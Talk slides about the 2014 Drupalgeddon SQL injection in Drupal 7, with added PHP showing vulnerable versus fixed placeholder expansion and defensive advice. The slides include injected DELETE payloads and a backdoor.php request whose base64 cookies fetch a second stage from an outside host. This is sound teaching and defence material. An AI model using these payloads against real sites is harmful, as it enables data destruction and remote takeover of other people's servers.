I Survived Drupalgeddon
I'm Matt Korostoff
I work for FFW
(and you should too)
Some Background
The Problem
A normal query
<?php
// A normal database query: one scalar value bound to one named placeholder.
$nid = 123;
db_query(
  "SELECT title FROM {node} WHERE nid = :nid",
  array(':nid' => $nid)
);
A normal query, with multiple arguments
<?php
// An array bound to a single placeholder: Drupal 7's database layer expands
// it into an IN (...) list for you.
$nids = array(123, 456, 489);
db_query(
  "SELECT title FROM {node} WHERE nid IN (:nids)",
  array(':nids' => $nids)
);
A normal query, with multiple arguments, expanded
<?php
// What the database layer turns the previous query into: one placeholder per
// array element, named after the original placeholder plus the array key.
$nids = array(123, 456, 489);
db_query(
  "SELECT title FROM {node} WHERE nid IN (:nids_0, :nids_1, :nids_2)",
  array(':nids_0' => 123, ':nids_1' => 456, ':nids_2' => 489)
);
A malicious query
<?php
// The array *keys* are attacker-controlled here (a request parameter
// submitted as an array, name[...]=..., is enough). Before 7.32 the keys were
// used verbatim to build the new placeholder names, so they are spliced into
// the SQL string without escaping:
//   ... WHERE nid IN (:nids_;DELETE FROM node;, :nids_;DELETE FROM users;, ...)
$nids = array(
  ";DELETE FROM node;" => 123,
  ";DELETE FROM users;" => 456,
  ";DELETE FROM system;" => 489
);
db_query(
  "SELECT title FROM {node} WHERE nid IN (:nids)",
  array(':nids' => $nids)
);
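To make the mechanism concrete, here is an added, stand-alone re-creation of the placeholder expansion that Drupal 7's DatabaseConnection::expandArguments() performs, once as it behaved before 7.32 and once with the 7.32 fix, run over the arrays from the slides. This is example code written for this page, not the slides' own code and not Drupal core itself; the function names expand_arguments_vulnerable and expand_arguments_fixed are my own, and the inputs are constructed.

```php
<?php
// Added example (not from the slides or from Drupal core): a stand-alone
// re-creation of the key handling in DatabaseConnection::expandArguments()
// before and after the SA-CORE-2014-005 fix. Run with: php expand.php

/**
 * Pre-7.32 behaviour: the caller's array keys are appended verbatim to the
 * placeholder name, so whatever the keys contain ends up inside the SQL.
 */
function expand_arguments_vulnerable($query, array $args) {
  foreach (array_filter($args, 'is_array') as $key => $data) {
    $new_keys = array();
    foreach ($data as $i => $value) {
      $new_keys[$key . '_' . $i] = $value;
    }
    // Replace ":nids" (and only ":nids", hence \b) with the expanded list.
    $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
    unset($args[$key]);
    $args += $new_keys;
  }
  return array($query, $args);
}

/**
 * 7.32 fix: array_values() discards the caller's keys, so the placeholder
 * names are always ":nids_0", ":nids_1", ... regardless of the input.
 */
function expand_arguments_fixed($query, array $args) {
  foreach (array_filter($args, 'is_array') as $key => $data) {
    $new_keys = array();
    foreach (array_values($data) as $i => $value) {
      $new_keys[$key . '_' . $i] = $value;
    }
    $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
    unset($args[$key]);
    $args += $new_keys;
  }
  return array($query, $args);
}

$sql = "SELECT title FROM {node} WHERE nid IN (:nids)";

// Constructed inputs: the malicious array from the slides, where the
// attacker controls the keys rather than the values.
$malicious = array(':nids' => array(
  ";DELETE FROM node;"   => 123,
  ";DELETE FROM users;"  => 456,
  ";DELETE FROM system;" => 489,
));

foreach (array('vulnerable', 'fixed') as $variant) {
  $fn = "expand_arguments_$variant";
  list($q, $a) = $fn($sql, $malicious);
  echo "$variant:\n  $q\n  args: " . json_encode($a) . "\n";
}
```

The vulnerable variant prints a query whose IN list reads `:nids_;DELETE FROM node;, :nids_;DELETE FROM users;, :nids_;DELETE FROM system;`, i.e. the attacker's text sits in the statement before it ever reaches the driver; the fixed variant prints `IN (:nids_0, :nids_1, :nids_2)` with the same three values bound under those names. Whether the extra statements then execute is up to the driver: Drupal 7's MySQL driver enables PDO's emulated prepares, so the stacked statements were sent to the server as a single string, which is what made this a one-request exploit.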
Hacking time!
We will:
- Inject SQL
- Execute code
- Upload files
Step 1.
Insert a row in menu_router
Step 2.
Get arbitrary code execution
Using backdoor.php
GET /modules/poll/backdoor.php HTTP/1.1
Host: exploited.com
Cookie: Kcqf3=base64_decode; Kcqf2=cHJlZ19yZXBsYWNl; Kcqf1=ZmlsZV9nZXRfY29udGVudHMoIm1hdHRrb3Jvc3RvZmYuY29tL3VwbG9hZGVyLnBocCIp
The payload travels in cookie values, which a default access log does not record. Kcqf3 is the literal string base64_decode; Kcqf2 decodes to preg_replace; Kcqf1 decodes to file_get_contents("mattkorostoff.com/uploader.php"), i.e. fetch the next stage from the attacker's host.
Step 3.
Get file upload access
Defending Your Site
Upgrade to Drupal 7.32+ or Drupal 8.0-beta2+ (the releases that contain the SA-CORE-2014-005 fix)
Set proper file permissions
Host with professionals
Acquia
Pantheon
platform.sh
Black Mesh
Take AUTOMATED nightly backups
#Backup database
0 2 * * * drush @yoursite sql-dump > /path/to/$(date +\%Y\%m\%d\%H\%M\%S).sql
Store your code in version control
Make sure cron is running
#Every two hours, on the hour (a leading "*" would run it every minute of those hours)
0 */2 * * * drush @yoursite cron
Upgrade to PHP 5.5+
Automate security patches
#Without git
0 */2 * * * drush @yoursite up -y --security
#With git: one line, because crontab entries cannot be continued across lines
0 */2 * * * cd /path/to/your/repository/ && drush up --security -y && git commit -am 'Automatic security update' && git push origin master
Drop POST traffic in Varnish
#VCL (Varnish 3 syntax; Varnish 4+ uses req.method and return (synth(404, "No")))
if (req.request == "POST") {
  error 404 "No";
}
#.htaccess (Apache 2.2 syntax; Apache 2.4 uses Require ip 123.123.123.123)
Order deny,allow
Deny from all
Allow from 123.123.123.123
Was this really "Drupalgeddon"?
Thanks!